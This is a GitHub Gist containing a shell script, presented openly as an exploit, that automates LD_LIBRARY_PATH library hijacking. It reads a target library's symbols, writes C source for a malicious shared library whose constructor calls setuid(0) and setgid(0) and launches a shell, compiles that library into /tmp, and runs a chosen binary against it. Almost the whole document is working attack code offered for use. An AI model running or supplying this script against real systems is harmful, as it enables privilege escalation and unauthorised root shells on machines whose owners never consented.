Last active
February 15, 2024 03:42
-
-
Save daniruiz/3d4b59fb0f289b206b2c8e5828f7a518 to your computer and use it in GitHub Desktop.
Script that automatically generates malicious library and exploits binary through LD_LIBRARY_PATH Hijacking. The script generates the list of missing symbols, based on the specified library, and creates the version-script map file to avoid error messages when loading the new created malicious library.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/sh | |
| # ./ld_path_exploit.sh /usr/lib/libgpg-error.so.0 top | |
| TARGET_LIB=$1 | |
| MISSING_SYMBOLS="$(readelf -s --wide ${TARGET_LIB} \ | |
| | grep 'FUNC\|OBJECT' \ | |
| | grep -v 'UND\|ABS' \ | |
| | awk '{print $8}' \ | |
| | sed 's/@@/ /g')" | |
| LIBS="$(echo "${MISSING_SYMBOLS}" \ | |
| | awk '{print $2}' \ | |
| | sort -u)" | |
| # ------------------------------------------------------------------------------ | |
| # C code with malicious library | |
| # ------------------------------------------------------------------------------ | |
| cat << EOF > /tmp/hax.c | |
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <unistd.h> | |
| static void runmahpayload () __attribute__((constructor)); | |
| $(echo "${MISSING_SYMBOLS}" \ | |
| | awk '{print $1}' \ | |
| | grep -v '\.\|@' \ | |
| | sed -e 's/^/int /g' -e 's/$/;/g') | |
| void runmahpayload () { | |
| /* Malicious code HERE! */ | |
| setuid(0); | |
| setgid(0); | |
| printf("DLL HIJACKING IN PROGRESS\n"); | |
| system("sh"); | |
| } | |
| EOF | |
| # ------------------------------------------------------------------------------ | |
| # ------------------------------------------------------------------------------ | |
| # MAP file with library symbols | |
| # ------------------------------------------------------------------------------ | |
| rm -f /tmp/hax.map | |
| for lib in ${LIBS}; do | |
| echo "${lib} {" | |
| echo "${MISSING_SYMBOLS}" \ | |
| | grep "${lib}" \ | |
| | awk '{print $1}' \ | |
| | grep -v '\.\|@' \ | |
| | sed 's/$/;/g' | |
| echo "};" | |
| done > /tmp/hax.map | |
| # ------------------------------------------------------------------------------ | |
| gcc_params="$([ -s /tmp/hax.map ] && echo "-Wl,-version-script /tmp/hax.map")" | |
| rm -f /tmp/*.so* | |
| gcc -fPIC -shared $gcc_params -o /tmp/"$(basename ${TARGET_LIB})" /tmp/hax.c | |
| shift | |
| eval LD_LIBRARY_PATH=/tmp/ $@ |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment